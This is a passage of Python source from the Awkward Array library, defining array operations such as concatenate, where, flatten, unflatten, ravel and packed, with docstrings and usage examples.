one_dimensional + nested_lists
would then have the same effect as the procedural code
for x, outer in zip(one_dimensional, nested_lists):
output = []
for inner in outer:
output.append(x + inner)
yield output
where `x` has the same value for each `inner` in the inner loop.
Awkward Array's broadcasting manages to have it both ways by applying the
following rules:
* If all dimensions are regular (i.e. #ak.types.RegularType), like NumPy,
implicit broadcasting aligns to the right, like NumPy.
* If any dimension is variable (i.e. #ak.types.ListType), which can
never be true of NumPy, implicit broadcasting aligns to the left.
* Explicit broadcasting with a length-1 regular dimension always
broadcasts, like NumPy.
Thus, it is important to be aware of the distinction between a dimension
that is declared to be regular in the type specification and a dimension
that is allowed to be variable (even if it happens to have the same length
for all elements). This distinction is can be accessed through the
#ak.Array.type, but it is lost when converting an array into JSON or
Python objects.
"""
(highlevel, left_broadcast, right_broadcast) = ak._util.extra(
(),
kwargs,
[("highlevel", True), ("left_broadcast", True), ("right_broadcast", True)],
)
inputs = []
for x in arrays:
y = ak.operations.convert.to_layout(x, allow_record=True, allow_other=True)
if isinstance(y, ak.partition.PartitionedArray):
y = y.toContent()
if not isinstance(y, (ak.layout.Content, ak.layout.Record)):
y = ak.layout.NumpyArray(ak.nplike.of(*arrays).array([y]))
inputs.append(y)
def getfunction(inputs):
if all(isinstance(x, ak.layout.NumpyArray) for x in inputs):
return lambda: tuple(inputs)
else:
return None
behavior = ak._util.behaviorof(*arrays)
out = ak._util.broadcast_and_apply(
inputs,
getfunction,
behavior,
left_broadcast=left_broadcast,
right_broadcast=right_broadcast,
pass_depth=False,
numpy_to_regular=True,
)
assert isinstance(out, tuple)
if highlevel:
return [ak._util.wrap(x, behavior) for x in out]
else:
return list(out)
@ak._connect._numpy.implements("concatenate")
def concatenate(
arrays, axis=0, merge=True, mergebool=True, highlevel=True, behavior=None
):
"""
Args:
arrays: Arrays to concatenate along any dimension.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
merge (bool): If True, combine data into the same buffers wherever
possible, eliminating unnecessary #ak.layout.UnionArray8_64 types
at the expense of materializing #ak.layout.VirtualArray nodes.
mergebool (bool): If True, boolean and nummeric data can be combined
into the same buffer, losing information about False vs `0` and
True vs `1`; otherwise, they are kept in separate buffers with
distinct types (using an #ak.layout.UnionArray8_64).
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array with `arrays` concatenated. For `axis=0`, this means that
one whole array follows another. For `axis=1`, it means that the `arrays`
must have the same lengths and nested lists are each concatenated,
element for element, and similarly for deeper levels.
"""
contents = [
ak.operations.convert.to_layout(
x, allow_record=False if axis == 0 else True, allow_other=True
)
for x in arrays
]
if not any(
isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
for x in contents
):
raise ValueError(
"need at least one array to concatenate"
+ ak._util.exception_suffix(__file__)
)
first_content = [
x
for x in contents
if isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
][0]
posaxis = first_content.axis_wrap_if_negative(axis)
maxdepth = max(
[
x.minmax_depth[1]
for x in contents
if isinstance(x, (ak.layout.Content, ak.partition.PartitionedArray))
]
)
if not 0 <= posaxis < maxdepth:
raise ValueError(
"axis={0} is beyond the depth of this array or the depth of this array "
"is ambiguous".format(axis) + ak._util.exception_suffix(__file__)
)
for x in contents:
if isinstance(x, ak.layout.Content):
if x.axis_wrap_if_negative(axis) != posaxis:
raise ValueError(
"arrays to concatenate do not have the same depth for negative "
"axis={0}".format(axis) + ak._util.exception_suffix(__file__)
)
if any(isinstance(x, ak.partition.PartitionedArray) for x in contents):
if posaxis == 0:
partitions = []
offsets = [0]
for content in contents:
if isinstance(content, ak.partition.PartitionedArray):
start = 0
for stop, part in __builtins__["zip"](
content.stops, content.partitions
):
count = stop - start
start = stop
partitions.append(part)
offsets.append(offsets[-1] + count)
elif isinstance(content, ak.layout.Content):
partitions.append(content)
offsets.append(offsets[-1] + len(content))
else:
partitions.append(
ak.operations.convert.from_iter([content], highlevel=False)
)
offsets.append(offsets[-1] + 1)
out = ak.partition.IrregularlyPartitionedArray(partitions, offsets[1:])
else:
for content in contents:
if isinstance(content, ak.partition.PartitionedArray):
stops = content.stops
slices = []
start = 0
for stop in stops:
slices.append(slice(start, stop))
start = stop
break
partitions = []
offsets = [0]
for slc in slices:
newcontents = []
for content in contents:
if isinstance(content, ak.partition.PartitionedArray):
newcontents.append(content[slc].toContent())
elif isinstance(content, ak.layout.Content):
newcontents.append(content[slc])
else:
newcontents.append(content)
partitions.append(
concatenate(
newcontents,
axis=axis,
merge=merge,
mergebool=mergebool,
highlevel=False,
)
)
offsets.append(offsets[-1] + len(partitions[-1]))
out = ak.partition.IrregularlyPartitionedArray(partitions, offsets[1:])
elif posaxis == 0:
contents = [
x
if isinstance(x, ak.layout.Content)
else ak.operations.convert.to_layout([x])
for x in contents
]
batch = [contents[0]]
for x in contents[1:]:
if batch[-1].mergeable(x, mergebool=mergebool):
batch.append(x)
else:
collapsed = batch[0].mergemany(batch[1:])
batch = [collapsed.merge_as_union(x)]
out = batch[0].mergemany(batch[1:])
if isinstance(out, ak._util.uniontypes):
out = out.simplify(merge=merge, mergebool=mergebool)
else:
def getfunction(inputs, depth):
if depth == posaxis and any(
isinstance(x, ak._util.optiontypes) for x in inputs
):
nextinputs = []
for x in inputs:
if isinstance(x, ak._util.optiontypes) and isinstance(
x.content, ak._util.listtypes
):
nextinputs.append(fill_none(x, [], axis=0, highlevel=False))
else:
nextinputs.append(x)
inputs = nextinputs
if depth == posaxis and all(
isinstance(x, ak._util.listtypes)
or (isinstance(x, ak.layout.NumpyArray) and x.ndim > 1)
or not isinstance(x, ak.layout.Content)
for x in inputs
):
nplike = ak.nplike.of(*inputs)
length = max(
[len(x) for x in inputs if isinstance(x, ak.layout.Content)]
)
nextinputs = []
for x in inputs:
if isinstance(x, ak.layout.Content):
nextinputs.append(x)
else:
nextinputs.append(
ak.layout.ListOffsetArray64(
ak.layout.Index64(
nplike.arange(length + 1, dtype=np.int64)
),
ak.layout.NumpyArray(
nplike.broadcast_to(nplike.array([x]), (length,))
),
)
)
counts = nplike.zeros(len(nextinputs[0]), dtype=np.int64)
all_counts = []
all_flatten = []
for x in nextinputs:
o, f = x.offsets_and_flatten(1)
o = nplike.asarray(o)
c = o[1:] - o[:-1]
nplike.add(counts, c, out=counts)
all_counts.append(c)
all_flatten.append(f)
offsets = nplike.empty(len(nextinputs[0]) + 1, dtype=np.int64)
offsets[0] = 0
nplike.cumsum(counts, out=offsets[1:])
offsets = ak.layout.Index64(offsets)
tags, index = ak.layout.UnionArray8_64.nested_tags_index(
offsets,
[ak.layout.Index64(x) for x in all_counts],
)
inner = ak.layout.UnionArray8_64(tags, index, all_flatten)
out = ak.layout.ListOffsetArray64(
offsets, inner.simplify(merge=merge, mergebool=mergebool)
)
return lambda: (out,)
elif any(
x.minmax_depth == (1, 1)
for x in inputs
if isinstance(x, ak.layout.Content)
):
raise ValueError(
"at least one array is not deep enough to concatenate at "
"axis={0}".format(axis) + ak._util.exception_suffix(__file__)
)
else:
return None
out = ak._util.broadcast_and_apply(
contents,
getfunction,
behavior=ak._util.behaviorof(*arrays, behavior=behavior),
allow_records=True,
right_broadcast=False,
pass_depth=True,
)[0]
return ak._util.maybe_wrap(
out, ak._util.behaviorof(*arrays, behavior=behavior), highlevel
)
@ak._connect._numpy.implements("where")
def where(condition, *args, **kwargs):
"""
Args:
condition (np.ndarray or rectilinear #ak.Array of booleans): In the
three-argument form of this function (`condition`, `x`, `y`),
True values in `condition` select values from `x` and False
values in `condition` select values from `y`.
x: Data with the same length as `condition`.
y: Data with the same length as `condition`.
mergebool (bool, default is True): If True, boolean and nummeric data
can be combined into the same buffer, losing information about
False vs `0` and True vs `1`; otherwise, they are kept in separate
buffers with distinct types (using an #ak.layout.UnionArray8_64).
highlevel (bool, default is True): If True, return an #ak.Array;
otherwise, return a low-level #ak.layout.Content subclass.
This function has a one-argument form, `condition` without `x` or `y`, and
a three-argument form, `condition`, `x`, and `y`. In the one-argument form,
it is completely equivalent to NumPy's
[nonzero](https://docs.scipy.org/doc/numpy/reference/generated/numpy.nonzero.html)
function.
In the three-argument form, it acts as a vectorized ternary operator:
`condition`, `x`, and `y` must all have the same length and
output[i] = x[i] if condition[i] else y[i]
for all `i`. The structure of `x` and `y` do not need to be the same; if
they are incompatible types, the output will have #ak.type.UnionType.
"""
mergebool, highlevel = ak._util.extra(
(), kwargs, [("mergebool", True), ("highlevel", True)]
)
akcondition = ak.operations.convert.to_layout(
condition, allow_record=False, allow_other=False
)
if len(args) == 0:
nplike = ak.nplike.of(akcondition)
if isinstance(akcondition, ak.partition.PartitionedArray):
akcondition = akcondition.replace_partitions(
[
ak.layout.NumpyArray(ak.operations.convert.to_numpy(x))
for x in akcondition.partitions
]
)
else:
akcondition = ak.layout.NumpyArray(
ak.operations.convert.to_numpy(akcondition)
)
out = nplike.nonzero(ak.operations.convert.to_numpy(akcondition))
if highlevel:
return tuple(
ak._util.wrap(ak.layout.NumpyArray(x), ak._util.behaviorof(condition))
for x in out
)
else:
return tuple(ak.layout.NumpyArray(x) for x in out)
elif len(args) == 1:
raise ValueError(
"either both or neither of x and y should be given"
+ ak._util.exception_suffix(__file__)
)
elif len(args) == 2:
left, right = [
ak.operations.convert.to_layout(x, allow_record=False, allow_other=True)
for x in args
]
good_arrays = [akcondition]
if isinstance(left, ak.layout.Content):
good_arrays.append(left)
if isinstance(right, ak.layout.Content):
good_arrays.append(right)
nplike = ak.nplike.of(*good_arrays)
def getfunction(inputs):
akcondition, left, right = inputs
if isinstance(akcondition, ak.layout.NumpyArray):
npcondition = nplike.asarray(akcondition)
tags = ak.layout.Index8((npcondition == 0).view(np.int8))
index = ak.layout.Index64(nplike.arange(len(tags), dtype=np.int64))
if not isinstance(left, ak.layout.Content):
left = ak.layout.NumpyArray(nplike.repeat(left, len(tags)))
if not isinstance(right, ak.layout.Content):
right = ak.layout.NumpyArray(nplike.repeat(right, len(tags)))
tmp = ak.layout.UnionArray8_64(tags, index, [left, right])
return lambda: (tmp.simplify(mergebool=mergebool),)
else:
return None
behavior = ak._util.behaviorof(akcondition, left, right)
out = ak._util.broadcast_and_apply(
[akcondition, left, right],
getfunction,
behavior,
pass_depth=False,
numpy_to_regular=True,
)
return ak._util.maybe_wrap(out[0], behavior, highlevel)
else:
raise TypeError(
"where() takes from 1 to 3 positional arguments but {0} were "
"given".format(len(args) + 1) + ak._util.exception_suffix(__file__)
)
def flatten(array, axis=1, highlevel=True, behavior=None):
"""
Args:
array: Data containing nested lists to flatten.
axis (None or int): If None, the operation flattens all levels of
nesting, returning a 1-dimensional array. Otherwise, it flattens
at a specified depth. The outermost dimension is `0`, followed
by `1`, etc., and negative values count backward from the
innermost: `-1` is the innermost dimension, `-2` is the next
level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array with one level of nesting removed by erasing the
boundaries between consecutive lists. Since this operates on a level of
nesting, `axis=0` is a special case that only removes values at the
top level that are equal to None.
Consider the following doubly nested `array`.
ak.Array([[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]],
[],
[
[7.7],
[8.8, 9.9]
]])
At `axis=1`, the outer lists (length 4, length 0, length 2) become a single
list (of length 6).
>>> print(ak.flatten(array, axis=1))
[[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6], [7.7], [8.8, 9.9]]
At `axis=2`, the inner lists (lengths 3, 0, 2, 1, 1, and 2) become three
lists (of lengths 6, 0, and 3).
>>> print(ak.flatten(array, axis=2))
[[1.1, 2.2, 3.3, 4.4, 5.5, 6.6], [], [7.7, 8.8, 9.9]]
There's also an option to completely flatten the array with `axis=None`.
This is useful for passing the data to a function that doesn't care about
nested structure, such as a plotting routine.
>>> print(ak.flatten(array, axis=None))
[1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
Missing values are eliminated by flattening: there is no distinction
between an empty list and a value of None at the level of flattening.
>>> array = ak.Array([[1.1, 2.2, 3.3], None, [4.4], [], [5.5]])
>>> ak.flatten(array, axis=1)
<Array [1.1, 2.2, 3.3, 4.4, 5.5] type='5 * float64'>
As a consequence, flattening at `axis=0` does only one thing: it removes
None values from the top level.
>>> ak.flatten(array, axis=0)
<Array [[1.1, 2.2, 3.3], [4.4], [], [5.5]] type='4 * var * float64'>
As a technical detail, the flattening operation can be trivial in a common
case, #ak.layout.ListOffsetArray in which the first `offset` is `0`.
In that case, the flattened data is simply the array node's `content`.
>>> array.layout
<ListOffsetArray64>
<offsets><Index64 i="[0 4 4 6]" offset="0" length="4"/></offsets>
<content><ListOffsetArray64>
<offsets><Index64 i="[0 3 3 5 6 7 9]" offset="0" length="7"/></offsets>
<content>
<NumpyArray format="d" shape="9" data="1.1 2.2 3.3 4.4 5.5 6.6 7.7 8.8 9.9"/>
</content>
</ListOffsetArray64></content>
</ListOffsetArray64>
>>> np.asarray(array.layout.content.content)
array([1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
However, it is important to keep in mind that this is a special case:
#ak.flatten and `content` are not interchangeable!
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
nplike = ak.nplike.of(layout)
if axis is None:
out = ak._util.completely_flatten(layout)
assert isinstance(out, tuple) and all(isinstance(x, np.ndarray) for x in out)
if any(isinstance(x, nplike.ma.MaskedArray) for x in out):
out = ak.layout.NumpyArray(nplike.ma.concatenate(out))
else:
out = ak.layout.NumpyArray(nplike.concatenate(out))
elif axis == 0 or layout.axis_wrap_if_negative(axis) == 0:
def apply(layout):
if isinstance(layout, ak._util.virtualtypes):
return apply(layout.array)
elif isinstance(layout, ak._util.unknowntypes):
return apply(ak.layout.NumpyArray(nplike.array([])))
elif isinstance(layout, ak._util.indexedtypes):
return apply(layout.project())
elif isinstance(layout, ak._util.uniontypes):
if not any(
isinstance(x, ak._util.optiontypes)
and not isinstance(x, ak.layout.UnmaskedArray)
for x in layout.contents
):
return layout
tags = nplike.asarray(layout.tags)
index = nplike.array(nplike.asarray(layout.index), copy=True)
bigmask = nplike.empty(len(index), dtype=np.bool_)
for tag, content in enumerate(layout.contents):
if isinstance(content, ak._util.optiontypes) and not isinstance(
content, ak.layout.UnmaskedArray
):
bigmask[:] = False
bigmask[tags == tag] = nplike.asarray(content.bytemask()).view(
np.bool_
)
index[bigmask] = -1
good = index >= 0
return ak.layout.UnionArray8_64(
ak.layout.Index8(tags[good]),
ak.layout.Index64(index[good]),
layout.contents,
)
elif isinstance(layout, ak._util.optiontypes):
return layout.project()
else:
return layout
if isinstance(layout, ak.partition.PartitionedArray):
out = ak.partition.IrregularlyPartitionedArray(
[apply(x) for x in layout.partitions]
)
else:
out = apply(layout)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
else:
out = layout.flatten(axis)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def unflatten(array, counts, axis=0, highlevel=True, behavior=None):
"""
Args:
array: Data to create an array with an additional level from.
counts (int or array): Number of elements the new level should have.
If an integer, the new level will be regularly sized; otherwise,
it will consist of variable-length lists with the given lengths.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array with an additional level of nesting. This is roughly the
inverse of #ak.flatten, where `counts` were obtained by #ak.num (both with
`axis=1`).
For example,
>>> original = ak.Array([[0, 1, 2], [], [3, 4], [5], [6, 7, 8, 9]])
>>> counts = ak.num(original)
>>> array = ak.flatten(original)
>>> counts
<Array [3, 0, 2, 1, 4] type='5 * int64'>
>>> array
<Array [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] type='10 * int64'>
>>> ak.unflatten(array, counts)
<Array [[0, 1, 2], [], ... [5], [6, 7, 8, 9]] type='5 * var * int64'>
An inner dimension can be unflattened by setting the `axis` parameter, but
operations like this constrain the `counts` more tightly.
For example, we can subdivide an already divided list:
>>> original = ak.Array([[1, 2, 3, 4], [], [5, 6, 7], [8, 9]])
>>> print(ak.unflatten(original, [2, 2, 1, 2, 1, 1], axis=1))
[[[1, 2], [3, 4]], [], [[5], [6, 7]], [[8], [9]]]
But the counts have to add up to the lengths of those lists. We can't mix
values from the first `[1, 2, 3, 4]` with values from the next `[5, 6, 7]`.
>>> print(ak.unflatten(original, [2, 1, 2, 2, 1, 1], axis=1))
Traceback (most recent call last):
...
ValueError: structure imposed by 'counts' does not fit in the array at axis=1
Also note that new lists created by this function cannot cross partitions
(which is only possible at `axis=0`, anyway).
See also #ak.num and #ak.flatten.
"""
nplike = ak.nplike.of(array)
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if isinstance(counts, (numbers.Integral, np.integer)):
current_offsets = None
else:
counts = ak.operations.convert.to_layout(
counts, allow_record=False, allow_other=False
)
ptr_lib = ak.operations.convert.kernels(array)
counts = ak.operations.convert.to_kernels(counts, ptr_lib, highlevel=False)
if ptr_lib == "cpu":
counts = ak.operations.convert.to_numpy(counts, allow_missing=True)
mask = ak.nplike.numpy.ma.getmask(counts)
counts = ak.nplike.numpy.ma.filled(counts, 0)
elif ptr_lib == "cuda":
counts = ak.operations.convert.to_cupy(counts)
mask = False
else:
raise AssertionError(
"unrecognized kernels lib" + ak._util.exception_suffix(__file__)
)
if counts.ndim != 1:
raise ValueError(
"counts must be one-dimensional" + ak._util.exception_suffix(__file__)
)
if not issubclass(counts.dtype.type, np.integer):
raise ValueError(
"counts must be integers" + ak._util.exception_suffix(__file__)
)
current_offsets = [nplike.empty(len(counts) + 1, np.int64)]
current_offsets[0][0] = 0
nplike.cumsum(counts, out=current_offsets[0][1:])
def doit(layout):
if isinstance(counts, (numbers.Integral, np.integer)):
if counts < 0 or counts > len(layout):
raise ValueError(
"too large counts for array or negative counts"
+ ak._util.exception_suffix(__file__)
)
out = ak.layout.RegularArray(layout, counts)
else:
position = (
nplike.searchsorted(
current_offsets[0], nplike.array([len(layout)]), side="right"
)[0]
- 1
)
if position >= len(current_offsets[0]) or current_offsets[0][
position
] != len(layout):
raise ValueError(
"structure imposed by 'counts' does not fit in the array or partition "
"at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
)
offsets = current_offsets[0][: position + 1]
current_offsets[0] = current_offsets[0][position:] - len(layout)
out = ak.layout.ListOffsetArray64(ak.layout.Index64(offsets), layout)
if not isinstance(mask, (bool, np.bool_)):
index = ak.layout.Index8(nplike.asarray(mask).astype(np.int8))
out = ak.layout.ByteMaskedArray(index, out, valid_when=False)
return out
if axis == 0 or layout.axis_wrap_if_negative(axis) == 0:
if isinstance(layout, ak.partition.PartitionedArray):
outparts = []
for part in layout.partitions:
outparts.append(doit(part))
out = ak.partition.IrregularlyPartitionedArray(outparts)
else:
out = doit(layout)
else:
def transform(layout, depth, posaxis):
# Pack the current layout. This ensures that the `counts` array,
# which is computed with these layouts applied, aligns with the
# internal layout to be unflattened (#910)
layout = _pack_layout(layout)
posaxis = layout.axis_wrap_if_negative(posaxis)
if posaxis == depth and isinstance(layout, ak._util.listtypes):
# We are one *above* the level where we want to apply this.
listoffsetarray = layout.toListOffsetArray64(True)
outeroffsets = nplike.asarray(listoffsetarray.offsets)
content = doit(listoffsetarray.content[: outeroffsets[-1]])
if isinstance(content, ak.layout.ByteMaskedArray):
inneroffsets = nplike.asarray(content.content.offsets)
elif isinstance(content, ak.layout.RegularArray):
inneroffsets = nplike.asarray(
content.toListOffsetArray64(True).offsets
)
else:
inneroffsets = nplike.asarray(content.offsets)
positions = (
nplike.searchsorted(inneroffsets, outeroffsets, side="right") - 1
)
if not nplike.array_equal(inneroffsets[positions], outeroffsets):
raise ValueError(
"structure imposed by 'counts' does not fit in the array or partition "
"at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
)
return ak.layout.ListOffsetArray64(
ak.layout.Index64(positions), content
)
else:
return ak._util.transform_child_layouts(
transform, layout, depth, posaxis
)
if isinstance(layout, ak.partition.PartitionedArray):
outparts = []
for part in layout.partitions:
outparts.append(transform(part, depth=1, posaxis=axis))
out = ak.partition.IrregularlyPartitionedArray(outparts)
else:
out = transform(layout, depth=1, posaxis=axis)
if current_offsets is not None and not (
len(current_offsets[0]) == 1 and current_offsets[0][0] == 0
):
raise ValueError(
"structure imposed by 'counts' does not fit in the array or partition "
"at axis={0}".format(axis) + ak._util.exception_suffix(__file__)
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("ravel")
def ravel(array, highlevel=True, behavior=None):
"""
Args:
array: Data containing nested lists to flatten
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array with all level of nesting removed by erasing the
boundaries between consecutive lists.
This is the equivalent of NumPy's `np.ravel` for Awkward Arrays.
Consider the following doubly nested `array`.
ak.Array([[
[1.1, 2.2, 3.3],
[],
[4.4, 5.5],
[6.6]],
[],
[
[7.7],
[8.8, 9.9]
]])
Ravelling the array produces a flat array
>>> print(ak.ravel(array))
[1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
Missing values are eliminated by flattening: there is no distinction
between an empty list and a value of None at the level of flattening.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
nplike = ak.nplike.of(layout)
out = ak._util.completely_flatten(layout)
assert isinstance(out, tuple) and all(isinstance(x, np.ndarray) for x in out)
if any(isinstance(x, nplike.ma.MaskedArray) for x in out):
out = ak.layout.NumpyArray(nplike.ma.concatenate(out))
else:
out = ak.layout.NumpyArray(nplike.concatenate(out))
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def _pack_layout(layout):
nplike = ak.nplike.of(layout)
if isinstance(layout, ak.layout.NumpyArray):
return layout.contiguous()
# EmptyArray is a no-op
elif isinstance(layout, ak.layout.EmptyArray):
return layout
# Project indexed arrays
elif isinstance(layout, ak._util.indexedoptiontypes):
if isinstance(layout.content, ak._util.optiontypes):
return layout.simplify()
index = nplike.asarray(layout.index)
new_index = nplike.zeros_like(index)
is_none = index < 0
new_index[is_none] = -1
new_index[~is_none] = nplike.arange(len(new_index) - nplike.sum(is_none))
return ak.layout.IndexedOptionArray64(
ak.layout.Index64(new_index),
layout.project(),
layout.identities,
layout.parameters,
)
# Project indexed arrays
elif isinstance(layout, ak._util.indexedtypes):
return layout.project()
# ListArray performs both ordering and resizing
elif isinstance(
layout,
(
ak.layout.ListArray32,
ak.layout.ListArrayU32,
ak.layout.ListArray64,
),
):
return layout.toListOffsetArray64(True)
# ListOffsetArray performs resizing
elif isinstance(
layout,
(
ak.layout.ListOffsetArray32,
ak.layout.ListOffsetArray64,
ak.layout.ListOffsetArrayU32,
),
):
new_layout = layout.toListOffsetArray64(True)
new_length = new_layout.offsets[-1]
return ak.layout.ListOffsetArray64(
new_layout.offsets,
new_layout.content[:new_length],
new_layout.identities,
new_layout.parameters,
)
# UnmaskedArray just wraps another array
elif isinstance(layout, ak.layout.UnmaskedArray):
return ak.layout.UnmaskedArray(
layout.content, layout.identities, layout.parameters
)
# UnionArrays can be simplified
# and their contents too
elif isinstance(layout, ak._util.uniontypes):
layout = layout.simplify()
# If we managed to lose the drop type entirely
if not isinstance(layout, ak._util.uniontypes):
return layout
# Pack simplified layout
tags = nplike.asarray(layout.tags)
index = nplike.asarray(layout.index)
new_contents = [None] * len(layout.contents)
new_index = nplike.zeros_like(index)
# Compact indices
for i in range(len(layout.contents)):
is_i = tags == i
new_contents[i] = layout.project(i)
new_index[is_i] = nplike.arange(nplike.sum(is_i))
return ak.layout.UnionArray8_64(
ak.layout.Index8(tags),
ak.layout.Index64(new_index),
new_contents,
layout.identities,
layout.parameters,
)
# RecordArray contents can be truncated
elif isinstance(layout, ak.layout.RecordArray):
return ak.layout.RecordArray(
[c[: len(layout)] for c in layout.contents],
layout.recordlookup,
len(layout),
layout.identities,
layout.parameters,
)
# RegularArrays can change length
elif isinstance(layout, ak.layout.RegularArray):
if not len(layout):
return layout
content = layout.content
# Truncate content to perfect multiple of the RegularArray size
if layout.size > 0:
r = len(content) % layout.size
content = content[: len(content) - r]
else:
content = content[:0]
return ak.layout.RegularArray(
content,
layout.size,
len(layout),
layout.identities,
layout.parameters,
)
# BitMaskedArrays can change length
elif isinstance(layout, ak.layout.BitMaskedArray):
layout = layout.simplify()
if not isinstance(ak.type(layout.content), ak.types.PrimitiveType):
return layout.toIndexedOptionArray64()
return ak.layout.BitMaskedArray(
layout.mask,
layout.content[: len(layout)],
layout.valid_when,
len(layout),
layout.lsb_order,
layout.identities,
layout.parameters,
)
# ByteMaskedArrays can change length
elif isinstance(layout, ak.layout.ByteMaskedArray):
layout = layout.simplify()
if not isinstance(ak.type(layout.content), ak.types.PrimitiveType):
return layout.toIndexedOptionArray64()
return ak.layout.ByteMaskedArray(
layout.mask,
layout.content[: len(layout)],
layout.valid_when,
layout.identities,
layout.parameters,
)
elif isinstance(layout, ak.layout.VirtualArray):
return layout.array
elif isinstance(layout, ak.partition.PartitionedArray):
return layout
elif isinstance(layout, ak.layout.Record):
return ak.layout.Record(layout.array[layout.at : layout.at + 1], 0)
# Finally, fall through to failure
else:
raise AssertionError(
"unrecognized layout: " + repr(layout) + ak._util.exception_suffix(__file__)
)
def packed(array, highlevel=True, behavior=None):
"""
Args:
array: Array whose internal structure will be packed.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Returns an array with the same data as the input, but with packed inner structures:
- #ak.layout.NumpyArray becomes C-contiguous (if it isn't already)
- #ak.layout.RegularArray trims unrechable content
- #ak.layout.ListArray becomes #ak.layout.ListOffsetArray, making all list data contiguous
- #ak.layout.ListOffsetArray starts at `offsets[0] == 0`, trimming unreachable content
- #ak.layout.RecordArray trims unreachable contents
- #ak.layout.IndexedArray gets projected
- #ak.layout.IndexedOptionArray remains an #ak.layout.IndexedOptionArray (with simplified `index`) if it contains records, becomes #ak.layout.ByteMaskedArray otherwise
- #ak.layout.ByteMaskedArray becomes an #ak.layout.IndexedOptionArray if it contains records, stays a #ak.layout.ByteMaskedArray otherwise
- #ak.layout.BitMaskedArray becomes an #ak.layout.IndexedOptionArray if it contains records, stays a #ak.layout.BitMaskedArray otherwise
- #ak.layout.UnionArray gets projected contents
- #ak.layout.VirtualArray gets materialized
- #ak.layout.Record becomes a record over a single-item #ak.layout.RecordArray
Example:
>>> a = ak.Array([[1, 2, 3], [], [4, 5], [6], [7, 8, 9, 10]])
>>> b = a[::-1]
>>> b
<Array [[7, 8, 9, 10], [6, ... [], [1, 2, 3]] type='5 * var * int64'>
>>> b.layout
<ListArray64>
<starts><Index64 i="[6 5 3 3 0]" offset="0" length="5" at="0x55e091c2b1f0"/></starts>
<stops><Index64 i="[10 6 5 3 3]" offset="0" length="5" at="0x55e091a6ce80"/></stops>
<content><NumpyArray format="l" shape="10" data="1 2 3 4 5 6 7 8 9 10" at="0x55e091c47260"/></content>
</ListArray64>
>>> c = ak.packed(b)
>>> c
<Array [[7, 8, 9, 10], [6, ... [], [1, 2, 3]] type='5 * var * int64'>
>>> c.layout
<ListOffsetArray64>
<offsets><Index64 i="[0 4 5 7 7 10]" offset="0" length="6" at="0x55e091b077a0"/></offsets>
<content><NumpyArray format="l" shape="10" data="7 8 9 10 6 4 5 1 2 3" at="0x55e091d04d30"/></content>
</ListOffsetArray64>
Performing these operations will minimize the output size of data sent to
#ak.to_buffers (though conversions through Arrow, #ak.to_arrow and
#ak.to_parquet, do not need this because packing is part of that conversion).
See also #ak.to_buffers.
"""
layout = ak.operations.convert.to_layout(
array, allow_record=True, allow_other=False
)
def transform(layout, depth=1, user=None):
return ak._util.transform_child_layouts(
transform, _pack_layout(layout), depth, user
)
out = transform(layout)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def local_index(array, axis=-1, highlevel=True, behavior=None):
"""
Args:
array: Array to index.
axis (int): The dimension at which this operation is applied. The
outermost dimension is `0`, followed by `1`, etc., and negative
values count backward from the innermost: `-1` is the innermost
dimension, `-2` is the next level up, etc.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
For example,
>>> array = ak.Array([
... [[0.0, 1.1, 2.2], []],
... [[3.3, 4.4]],
... [],
... [[5.5], [], [6.6, 7.7, 8.8, 9.9]]])
>>> ak.local_index(array, axis=0)
<Array [0, 1, 2, 3] type='4 * int64'>
>>> ak.local_index(array, axis=1)
<Array [[0, 1], [0], [], [0, 1, 2]] type='4 * var * int64'>
>>> ak.local_index(array, axis=2)
<Array [[[0, 1, 2], []], ... [], [0, 1, 2, 3]]] type='4 * var * var * int64'>
Note that you can make a Pandas-style MultiIndex by calling this function on
every axis.
>>> multiindex = ak.zip([ak.local_index(array, i) for i in range(array.ndim)])
>>> multiindex
<Array [[[(0, 0, 0), (0, 0, ... ), (3, 2, 3)]]] type='4 * var * var * (int64, in...'>
>>> ak.to_list(multiindex)
[[[(0, 0, 0), (0, 0, 1), (0, 0, 2)], []],
[[(1, 0, 0), (1, 0, 1)]],
[],
[[(3, 0, 0)], [], [(3, 2, 0), (3, 2, 1), (3, 2, 2), (3, 2, 3)]]]
